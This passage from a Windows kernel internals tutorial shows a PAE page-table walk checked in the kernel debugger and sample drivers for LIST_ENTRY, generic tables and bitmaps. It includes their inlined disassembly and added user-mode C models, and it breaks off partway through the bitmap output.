<span style="font-family: Courier New, Courier, monospace;">Offset 16D14Ch: 00400000 + 16D14C = <b>56d14c</b></span></div>
<div style="text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I can assess the correctness of the physical address by verifying that the data I see reading the virtual address is the same I see reading the physical address:</span></div>
<div style="text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;">lkd> !dc 56d14c</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 56d14c 8b55ff8b 50c033ec 75ff5050 2c75ff30 ..U..3.PPP.u0.u,</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 56d15c ff2875ff 75ff2475 1c75ff20 ff1875ff .u(.u$.u .u..u..</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> db 8056d14c </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">8056d14c 8b ff 55 8b ec 33 c0 50-50 50 ff 75 30 ff 75 2c ..U..3.PPP.u0.u,</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">8056d15c ff 75 28 ff 75 24 ff 75-20 ff 75 1c ff 75 18 ff .u(.u$.u .u..u..</span></div>
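<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The two walks above (the 4K page at f897a000 and the 2MB page at 8056d14c) are instances of one algorithm, which is written out below as an added example in user-mode C; it is not code from the original post. The "physical memory" it reads is a constructed table that holds only the quadwords shown in the !dc dumps above (an assumption: nothing else is mapped), so the walk reproduces both results offline. The index split, the Present and Page Size bits and the address masks are the PAE page-table format from Intel's documentation; the helper names (split_pae_va, pae_vtop, demo_phys, ALG_DIRBASE) are mine.</span></div>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed "physical memory": only the quadwords that the two walks
   above touch, copied from the !dc dumps (assumption: nothing else is
   mapped, so any other physical read fails). */
typedef struct { uint64_t pa; uint64_t value; } phys_qword;

static const phys_qword g_phys[] = {
    { 0x081002e0ULL, 0x000000000f691001ULL }, /* PDPTE 0 of alg.exe (DirBase 081002e0) */
    { 0x081002e8ULL, 0x000000000f452001ULL }, /* PDPTE 1 */
    { 0x081002f0ULL, 0x000000000f693001ULL }, /* PDPTE 2 */
    { 0x081002f8ULL, 0x000000000f610001ULL }, /* PDPTE 3 */
    { 0x0f610e20ULL, 0x0000000001032163ULL }, /* PDE 0x1c4 in the PD at 0f610000 */
    { 0x01032bd0ULL, 0x000000000437b163ULL }, /* PTE 0x17a in the PT at 01032000 */
    { 0x0f693010ULL, 0x00000000004001e3ULL }, /* PDE 2 in the PD at 0f693000, PS set */
};

static int read_phys_qword(uint64_t pa, uint64_t *out)
{
    size_t i;
    for (i = 0; i < sizeof g_phys / sizeof g_phys[0]; i++)
        if (g_phys[i].pa == pa) { *out = g_phys[i].value; return 1; }
    return 0;
}

/* PAE entry format: bit 0 = Present, bit 7 of a PDE = Page Size (2MB),
   bits 12..51 = frame of the next table or of a 4K page, bits 21..51 = 2MB frame. */
#define PAE_P          0x1ULL
#define PAE_PS         0x80ULL
#define PAE_PFN_MASK   0x000FFFFFFFFFF000ULL
#define PAE_2MB_MASK   0x000FFFFFFFE00000ULL

typedef struct {
    uint32_t pdpe;      /* bits 31..30: index into the 4-entry PDPT */
    uint32_t pde;       /* bits 29..21: index into the page directory */
    uint32_t pte;       /* bits 20..12: index into the page table (4K pages only) */
    uint32_t offset_4k; /* bits 11..0 */
    uint32_t offset_2m; /* bits 20..0, used when the PDE has PS set */
} pae_va_parts;

static pae_va_parts split_pae_va(uint32_t va)
{
    pae_va_parts p;
    p.pdpe = va >> 30;
    p.pde = (va >> 21) & 0x1ff;
    p.pte = (va >> 12) & 0x1ff;
    p.offset_4k = va & 0xfff;
    p.offset_2m = va & 0x1fffff;
    return p;
}

typedef enum { VTOP_OK = 0, VTOP_NOT_PRESENT, VTOP_UNMAPPED_PHYS } vtop_status;

/* Walk PDPT -> PD -> (PT) starting at a process DirBase. Kernel addresses are
   shared by every process, so any DirBase works for them, as the post notes. */
static vtop_status pae_vtop(uint64_t dirbase, uint32_t va, uint64_t *phys, int *big_page)
{
    pae_va_parts p = split_pae_va(va);
    uint64_t pdpte, pde, pte;

    /* The PDPT is 32-byte aligned and holds four 8-byte entries. */
    if (!read_phys_qword((dirbase & ~0x1fULL) + p.pdpe * 8, &pdpte)) return VTOP_UNMAPPED_PHYS;
    if (!(pdpte & PAE_P)) return VTOP_NOT_PRESENT;

    if (!read_phys_qword((pdpte & PAE_PFN_MASK) + p.pde * 8, &pde)) return VTOP_UNMAPPED_PHYS;
    if (!(pde & PAE_P)) return VTOP_NOT_PRESENT;

    if (pde & PAE_PS) {  /* 2MB page: the PTE level disappears, 21-bit offset */
        *big_page = 1;
        *phys = (pde & PAE_2MB_MASK) | p.offset_2m;
        return VTOP_OK;
    }

    if (!read_phys_qword((pde & PAE_PFN_MASK) + p.pte * 8, &pte)) return VTOP_UNMAPPED_PHYS;
    if (!(pte & PAE_P)) return VTOP_NOT_PRESENT;

    *big_page = 0;
    *phys = (pte & PAE_PFN_MASK) | p.offset_4k;
    return VTOP_OK;
}

/* Wrappers over the alg.exe DirBase: physical address (0 on failure),
   large-page flag (-1 on failure) and the raw status. */
#define ALG_DIRBASE 0x081002e0ULL
static vtop_status demo_status(uint32_t va) { uint64_t ph = 0; int big = -1; return pae_vtop(ALG_DIRBASE, va, &ph, &big); }
static uint64_t demo_phys(uint32_t va) { uint64_t ph = 0; int big = -1; return pae_vtop(ALG_DIRBASE, va, &ph, &big) == VTOP_OK ? ph : 0; }
static int demo_big(uint32_t va) { uint64_t ph = 0; int big = -1; return pae_vtop(ALG_DIRBASE, va, &ph, &big) == VTOP_OK ? big : -1; }

int main(void)
{
    const uint32_t vas[] = { 0xf897a000u, 0x8056d14cu };
    size_t i;
    for (i = 0; i < 2; i++) {
        uint64_t ph = 0; int big = -1;
        vtop_status st = pae_vtop(ALG_DIRBASE, vas[i], &ph, &big);
        if (st == VTOP_OK)
            printf("%08x -> phys %08llx (%s page)\n", (unsigned)vas[i], (unsigned long long)ph, big ? "2MB" : "4K");
        else
            printf("%08x -> translation failed (%d)\n", (unsigned)vas[i], (int)st);
    }
    return 0;
}
```

<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The PS test on the PDE is what separates the two cases: for 004001e3 bit 7 is set, so the 21-bit offset is added to the 2MB frame, while for 01032163 it is clear and the walk continues into the page table. The two failure codes are kept apart on purpose: a clear Present bit is a property of the mapping, whereas an unreadable physical address only means the constructed table does not contain it.</span></div>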
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>6)</b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following code performs various operations on a list.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#include <ntddk.h>
#include <string.h>

DRIVER_INITIALIZE DriverEntry;
DRIVER_UNLOAD MyUnload;

/* Each record embeds a LIST_ENTRY; CONTAINING_RECORD recovers the
   enclosing mydata from a pointer to the embedded mylist member. */
typedef struct _mydata
{
    int a;
    char *s;
    LIST_ENTRY mylist;
} mydata;

#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif

VOID MyUnload(
    __in PDRIVER_OBJECT DriverObject
    )
{
    UNREFERENCED_PARAMETER(DriverObject);
    DbgPrint("Unload routine\n");
}

NTSTATUS
DriverEntry(
    __in PDRIVER_OBJECT DriverObject,
    __in PUNICODE_STRING RegistryPath
    )
{
    mydata data;
    LIST_ENTRY myhead;
    mydata data1, data2, data3;
    LIST_ENTRY *plist;
    int i = 0;

    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = &MyUnload;

    data1.a = 1;
    data1.s = "string one";
    data2.a = 2;
    data2.s = "string two";
    data3.a = 3;
    data3.s = "string three";

    /* An empty list is a head whose Flink and Blink point at itself. */
    InitializeListHead(&myhead);
    /* Build head -> data1 -> data2 -> data3 -> head. */
    InsertHeadList(&myhead, &(data1.mylist));
    InsertTailList(&myhead, &(data2.mylist));
    InsertTailList(&myhead, &(data3.mylist));

    if(IsListEmpty(&myhead))
    {
        DbgPrint("List is empty after initialization\n");
    }
    else
    {
        DbgPrint("List is not empty after initialization\n");
    }

    /* Walk forward until we are back at the head; the counter guards
       against looping forever on a corrupted list. */
    plist = myhead.Flink;
    while(plist != &myhead)
    {
        if(i++ > 20)
        {
            break;
        }
        DbgPrint("entry: %d ", (CONTAINING_RECORD(plist, mydata, mylist))->a );
        DbgPrint("string: %s \n", (CONTAINING_RECORD(plist, mydata, mylist))->s );
        plist = plist->Flink;
    }

    /* Unlink the middle entry, then the remaining head and tail:
       the list is empty afterwards. */
    RemoveEntryList(&(data2.mylist));
    RemoveHeadList(&myhead);
    RemoveTailList(&myhead);

    if(IsListEmpty(&myhead))
    {
        DbgPrint("List is empty at the end of DriverEntry\n");
    }
    else
    {
        DbgPrint("List is not empty at the end of DriverEntry\n");
    }
    return STATUS_SUCCESS;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">This is an example of the output it produces:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">List is not empty after initialization</span><br />
<span style="font-family: Courier New, Courier, monospace;">entry: 1 string: string one </span><br />
<span style="font-family: Courier New, Courier, monospace;">entry: 2 string: string two </span><br />
<span style="font-family: Courier New, Courier, monospace;">entry: 3 string: string three </span><br />
<span style="font-family: Courier New, Courier, monospace;">List is empty at the end of DriverEntry</span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">I identified the following inlined functions in the disassembled code:</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><i>InitializeListHead(&myhead)</i></span><br />
<span style="font-family: Verdana, sans-serif;"><i>InsertHeadList(&myhead, &(data1.mylist))</i></span><br />
<span style="font-family: Verdana, sans-serif;"><i>InsertTailList(&myhead, &(data2.mylist))</i></span><br />
<span style="font-family: Verdana, sans-serif;"><i>InsertTailList(&myhead, &(data3.mylist))</i></span><br />
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">(because of compiler optimizations, these routines have been "merged" to eliminate unnecessary instructions, thus the boundaries of each routine are not very well defined any more)</span></div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-78h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-30h], rax ; copy &myhead into data1.mylist.Blink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-38h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-78h], rax ; copy &data1.mylist into myhead.Flink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-38h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-50h], rax ; copy &data1.mylist into data2.mylist.Blink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-58h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-38h], rax ; copy &data2.mylist into data1.mylist.Flink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-78h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-18h], rax ; copy &myhead into data3.mylist.Flink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-58h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-10h], rax ; copy &data2.mylist into data3.mylist.Blink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-18h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-58h], rax ; copy &data3.mylist into data2.mylist.Flink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-18h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-70h], rax ; copy &data3.mylist into myhead.Blink</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>RemoveEntryList</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">mov rax, [rsp+48h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov rcx, [rsp+40h] </span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rax], rcx</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rcx+8], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>RemoveHeadList</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">mov rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov rcx, [rax]</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rsp+98h+var_78], rcx</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rcx+8], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>RemoveTailList</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">mov rax, [rsp+98h+var_70]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov rcx, [rax+8]</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rsp+98h+var_70], rcx</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rcx], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>IsListEmpty</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">lea rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">cmp [rsp+98h+var_78], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It is possible to see a pattern in these routines: since the operations they perform are always the same, the logic of the corresponding assembly instructions is the same too. However, when the routines are compiled, their instructions may use different operands (e.g. registers, stack variables or global offsets). The order of the instructions may differ as well, they may be interleaved with instructions from other computations, or compiler optimizations may merge some of them. In conclusion, although the "logical" pattern of a single routine is pretty much constant, its assembly implementation may have many variations that make the task of recognizing the pattern quite complicated.</span></div>
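<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To make the "logical" pattern concrete, here is an added user-mode C model of the LIST_ENTRY primitives; it is not the driver's code nor the WDK's own inline definitions. Each function body is the sequence of pointer stores seen in the listings above (the two stores of RemoveEntryList, the four of an insert), and replay_driver_sequence replays the steps of DriverEntry so the result can be checked without loading a driver. SafeRemoveEntryList is an added defensive variant, not in the original driver, that refuses to unlink an entry whose neighbours do not point back at it; that is the same inconsistency the fail-fast list check in later Windows versions aborts on. The function and type names other than the WDK ones are mine.</span></div>

```c
#include <stddef.h>
#include <stdio.h>

/* Same two-pointer layout as the kernel's LIST_ENTRY. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Recover the enclosing record from a pointer to its embedded member. */
#define CONTAINING_RECORD(address, type, field) \
    ((type *)((char *)(address) - offsetof(type, field)))

typedef struct _mydata { int a; const char *s; LIST_ENTRY mylist; } mydata;

/* An empty list is a head whose Flink and Blink point at itself; this is
   the "lea rax, [head] / cmp [head], rax" test seen in IsListEmpty. */
static void InitializeListHead(LIST_ENTRY *head) { head->Flink = head->Blink = head; }
static int IsListEmpty(const LIST_ENTRY *head) { return head->Flink == head; }

static void InsertHeadList(LIST_ENTRY *head, LIST_ENTRY *entry)
{
    LIST_ENTRY *first = head->Flink;
    entry->Flink = first;      /* the four stores of the inlined routine */
    entry->Blink = head;
    first->Blink = entry;
    head->Flink = entry;
}

static void InsertTailList(LIST_ENTRY *head, LIST_ENTRY *entry)
{
    LIST_ENTRY *last = head->Blink;
    entry->Flink = head;
    entry->Blink = last;
    last->Flink = entry;
    head->Blink = entry;
}

/* RemoveEntryList: the "mov [rax], rcx / mov [rcx+8], rax" pair, i.e.
   Blink->Flink = Flink and Flink->Blink = Blink. Returns 1 if now empty. */
static int RemoveEntryList(LIST_ENTRY *entry)
{
    LIST_ENTRY *flink = entry->Flink, *blink = entry->Blink;
    blink->Flink = flink;
    flink->Blink = blink;
    return flink == blink;
}

/* RemoveHeadList: head->Flink = first->Flink; first->Flink->Blink = head. */
static LIST_ENTRY *RemoveHeadList(LIST_ENTRY *head)
{
    LIST_ENTRY *entry = head->Flink, *next = entry->Flink;
    head->Flink = next;
    next->Blink = head;
    return entry;
}

/* RemoveTailList: head->Blink = last->Blink; last->Blink->Flink = head. */
static LIST_ENTRY *RemoveTailList(LIST_ENTRY *head)
{
    LIST_ENTRY *entry = head->Blink, *prev = entry->Blink;
    head->Blink = prev;
    prev->Flink = head;
    return entry;
}

/* Added defensive variant (not in the original driver): refuse to unlink an
   entry whose neighbours do not point back at it, instead of propagating the
   two stray pointers into the list. Returns 1 if unlinked, 0 if refused. */
static int SafeRemoveEntryList(LIST_ENTRY *entry)
{
    if (entry->Flink->Blink != entry || entry->Blink->Flink != entry) return 0;
    RemoveEntryList(entry);
    return 1;
}

/* Replays DriverEntry: build head -> 1 -> 2 -> 3, walk the list into codes[],
   then remove the middle entry, the head and the tail. Returns the number of
   entries walked; *empty_after receives IsListEmpty at the end. */
static int replay_driver_sequence(int codes[3], int *empty_after)
{
    LIST_ENTRY myhead, *plist;
    mydata data1 = { 1, "string one", { NULL, NULL } };
    mydata data2 = { 2, "string two", { NULL, NULL } };
    mydata data3 = { 3, "string three", { NULL, NULL } };
    int n = 0;
    InitializeListHead(&myhead);
    InsertHeadList(&myhead, &data1.mylist);
    InsertTailList(&myhead, &data2.mylist);
    InsertTailList(&myhead, &data3.mylist);
    for (plist = myhead.Flink; plist != &myhead && n < 3; plist = plist->Flink)
        codes[n++] = CONTAINING_RECORD(plist, mydata, mylist)->a;
    RemoveEntryList(&data2.mylist);
    RemoveHeadList(&myhead);
    RemoveTailList(&myhead);
    *empty_after = IsListEmpty(&myhead);
    return n;
}

/* Plain-value helpers for checking the replay. */
static int replay_walk_code(int index)
{
    int codes[3] = { -1, -1, -1 }, empty = 0, n = replay_driver_sequence(codes, &empty);
    return (index >= 0 && index < n) ? codes[index] : -1;
}
static int replay_list_empty_after(void)
{
    int codes[3], empty = 0;
    replay_driver_sequence(codes, &empty);
    return empty;
}

/* Constructed corruption: data2's Blink is redirected to an entry that does
   not point back. Returns 1 if the safe variant refused and the list is intact. */
static int safe_remove_rejects_corrupted(void)
{
    LIST_ENTRY head, stray;
    mydata data1 = { 1, "one", { NULL, NULL } }, data2 = { 2, "two", { NULL, NULL } };
    InitializeListHead(&head);
    InitializeListHead(&stray);
    InsertTailList(&head, &data1.mylist);
    InsertTailList(&head, &data2.mylist);
    data2.mylist.Blink = &stray;                    /* the corruption */
    if (SafeRemoveEntryList(&data2.mylist) != 0) return 0;
    return head.Blink == &data2.mylist && data1.mylist.Flink == &data2.mylist;
}

int main(void)
{
    int codes[3] = { 0, 0, 0 }, empty = 0, n = replay_driver_sequence(codes, &empty), i;
    for (i = 0; i < n; i++) printf("entry: %d\n", codes[i]);
    printf("List is %sempty at the end\n", empty ? "" : "not ");
    printf("safe unlink refused corrupted entry: %d\n", safe_remove_rejects_corrupted());
    return 0;
}
```

<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Read next to the listings, the model shows why the pattern survives compilation: whatever registers or stack slots the compiler picks, a remove is always two stores through the entry's neighbours and an insert is always four, so a recognizer can key on the shape of the pointer stores rather than on specific operands.</span></div>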
<br />
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>7)</b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following code illustrates the use of generic tables (the RTL_GENERIC_TABLE tree API) and bitmaps (RTL_BITMAP).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #include <ntddk.h>
#include <string.h>
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
// Element type stored in the generic table. The table copies sizeof(node)
// bytes of every inserted element into memory obtained from AllocateRoutine,
// so the caller's own copy can be discarded after the insert.
typedef struct _node
{
int code;
char *p;
} node;
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
UNREFERENCED_PARAMETER(DriverObject);
DbgPrint("Unload routine\n");
}
// Ordering callback: elements are sorted by "code", so a lookup or a delete
// only needs a node with the right code; the string pointer is ignored.
RTL_GENERIC_COMPARE_RESULTS
CompareRoutine (
__in struct _RTL_GENERIC_TABLE *Table,
__in PVOID FirstStruct,
__in PVOID SecondStruct
)
{
UNREFERENCED_PARAMETER(Table);
if(((node *)FirstStruct)->code < ((node *)SecondStruct)->code) return GenericLessThan;
if(((node *)FirstStruct)->code > ((node *)SecondStruct)->code) return GenericGreaterThan;
return GenericEqual;
}
// Allocation callback. ByteSize is larger than sizeof(node): it includes the
// table's own per-element header, so the callback must allocate exactly what
// it is asked for.
PVOID
AllocateRoutine (
__in struct _RTL_GENERIC_TABLE *Table,
__in CLONG ByteSize
)
{
UNREFERENCED_PARAMETER(Table);
return ExAllocatePoolWithTag(NonPagedPool, ByteSize, 'tag2');
}
VOID
FreeRoutine (
__in struct _RTL_GENERIC_TABLE *Table,
__in PVOID Buffer
)
{
UNREFERENCED_PARAMETER(Table);
ExFreePoolWithTag(Buffer, 'tag2');
}
// Deletes any element still in the table, then frees the table header.
// Used on the error paths so that a failing DriverEntry does not leak pool.
VOID DestroyTable(PRTL_GENERIC_TABLE Table)
{
PVOID element;
while((element = RtlEnumerateGenericTable(Table, TRUE)) != NULL)
{
RtlDeleteElementGenericTable(Table, element);
}
ExFreePoolWithTag(Table, 'tag1');
}
NTSTATUS
DriverEntry(
__in PDRIVER_OBJECT DriverObject,
__in PUNICODE_STRING RegistryPath
)
{
PRTL_GENERIC_TABLE generic_table;
BOOLEAN success;
node *ptNode;
node entry_one;
node entry_two;
node entry_three;
RTL_BITMAP rtl_bitmap;
ULONG *bitmap_buffer;
ULONG bitmap_size = 48;
ULONG bit_index, num_bits;
UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Driver started\n");
DriverObject->DriverUnload = &MyUnload;
entry_one.code = 1;
entry_one.p = "string one";
entry_two.code = 2;
entry_two.p = "string two";
entry_three.code = 3;
entry_three.p = "string three";
// The RTL_GENERIC_TABLE header is allocated from non-paged pool, like the
// elements themselves (see AllocateRoutine).
generic_table = ExAllocatePoolWithTag(NonPagedPool, sizeof(RTL_GENERIC_TABLE), 'tag1');
if(generic_table == NULL)
{
DbgPrint("Error in memory allocation\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
// The last parameter is an optional caller context handed to the callbacks.
RtlInitializeGenericTable(generic_table, &CompareRoutine, &AllocateRoutine, &FreeRoutine, NULL);
// Each insert copies the element; "success" reports whether a new element
// was created (FALSE if an equal element, per CompareRoutine, already existed).
if(RtlInsertElementGenericTable(generic_table, &entry_one, sizeof(entry_one), &success) == NULL)
{
DbgPrint("Error in first insert\n");
DestroyTable(generic_table);
return STATUS_INSUFFICIENT_RESOURCES;
}
if(RtlInsertElementGenericTable(generic_table, &entry_two, sizeof(entry_two), &success) == NULL)
{
DbgPrint("Error in second insert\n");
DestroyTable(generic_table);
return STATUS_INSUFFICIENT_RESOURCES;
}
if(RtlInsertElementGenericTable(generic_table, &entry_three, sizeof(entry_three), &success) == NULL)
{
DbgPrint("Error in third insert\n");
DestroyTable(generic_table);
return STATUS_INSUFFICIENT_RESOURCES;
}
DbgPrint("Number of elements in the table after initialization: %d\n", RtlNumberGenericTableElements(generic_table));
// Restart = TRUE begins the walk, FALSE continues it; elements come out in
// CompareRoutine order.
for (ptNode = RtlEnumerateGenericTable(generic_table, TRUE); ptNode != NULL; ptNode = RtlEnumerateGenericTable(generic_table, FALSE))
{
DbgPrint("Enumerating element: %d with string: %s \n", ptNode->code, ptNode->p);
}
// Lookup by key: only entry_two.code matters to CompareRoutine.
if( ( ptNode = RtlLookupElementGenericTable(generic_table, &entry_two) ) != NULL)
DbgPrint("Lookup element: %d with string: %s \n", ptNode->code, ptNode->p);
else
DbgPrint("Error in lookup element \n");
if(RtlDeleteElementGenericTable(generic_table, &entry_three) == TRUE)
DbgPrint("Element three was correctly deleted!\n");
else
DbgPrint("Error in deleting element three\n");
DbgPrint("Number of elements in the table after removing element three: %d\n", RtlNumberGenericTableElements(generic_table));
if(RtlDeleteElementGenericTable(generic_table, &entry_two) == TRUE)
DbgPrint("Element two was correctly deleted!\n");
else
DbgPrint("Error in deleting element two\n");
if(RtlDeleteElementGenericTable(generic_table, &entry_one) == TRUE)
DbgPrint("Element one was correctly deleted!\n");
else
DbgPrint("Error in deleting element one\n");
if(RtlNumberGenericTableElements(generic_table) == 0)
{
DbgPrint("Table is empty and will be deallocated\n");
ExFreePoolWithTag(generic_table, 'tag1');
}
else
{
DbgPrint("Some error occurred when freeing the list\n");
DestroyTable(generic_table);
return STATUS_INSUFFICIENT_RESOURCES;
}
// bitmap: 48 bits need ceil(48/32) = 2 ULONGs of ULONG-aligned storage,
// which pool memory is.
bitmap_buffer = ExAllocatePoolWithTag(NonPagedPool, 2*sizeof(ULONG), 'tag3');
if(bitmap_buffer == NULL)
{
DbgPrint("Error in memory allocation\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
// RtlInitializeBitMap only records the buffer and size; clear it explicitly.
RtlInitializeBitMap(&rtl_bitmap, bitmap_buffer, bitmap_size);
RtlClearAllBits(&rtl_bitmap);
DbgPrint("Number of bits set after initialization: %d\n", RtlNumberOfSetBits(&rtl_bitmap));
// Sets 5 bits starting at index 10, i.e. bits 10 to 14 inclusive.
RtlSetBits(&rtl_bitmap, 10, 5);
num_bits = RtlFindLongestRunClear(&rtl_bitmap, &bit_index);
DbgPrint("After setting bit ten to fifteen, the longest run of clear bits is at position %d size %d\n", bit_index, num_bits);
DbgPrint("The number of clear bits is: %d\n", RtlNumberOfClearBits(&rtl_bitmap));
RtlSetBit(&rtl_bitmap, 37);
// Range checks: bits 30..34 are still clear, the range 30..39 contains bit 37.
DbgPrint("Are bits from 30 to 35 clear? %d \n", RtlAreBitsClear(&rtl_bitmap, 30, 5));
DbgPrint("Are bits from 30 to 40 clear? %d \n", RtlAreBitsClear(&rtl_bitmap, 30, 10));
ExFreePoolWithTag(bitmap_buffer, 'tag3');
return STATUS_SUCCESS;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the output it produces:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Driver started</span><br />
<span style="font-family: Courier New, Courier, monospace;">Number of elements in the table after initialization: 3</span><br />
<span style="font-family: Courier New, Courier, monospace;">Enumerating element: 1 with string: string one </span><br />
<span style="font-family: Courier New, Courier, monospace;">Enumerating element: 2 with string: string two </span><br />
<span style="font-family: Courier New, Courier, monospace;">Enumerating element: 3 with string: string three </span><br />
<span style="font-family: Courier New, Courier, monospace;">Lookup element: 2 with string: string two </span><br />
<span style="font-family: Courier New, Courier, monospace;">Element three was correctly deleted!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Number of elements in the table after removing element three: 2</span><br />
<span style="font-family: Courier New, Courier, monospace;">Element two was correctly deleted!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Element one was correctly deleted!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Table is empty and will be deallocated</span><br />
<span style="font-family: Courier New, Courier, monospace;">Number of bits set after initialization: 0</span><br />
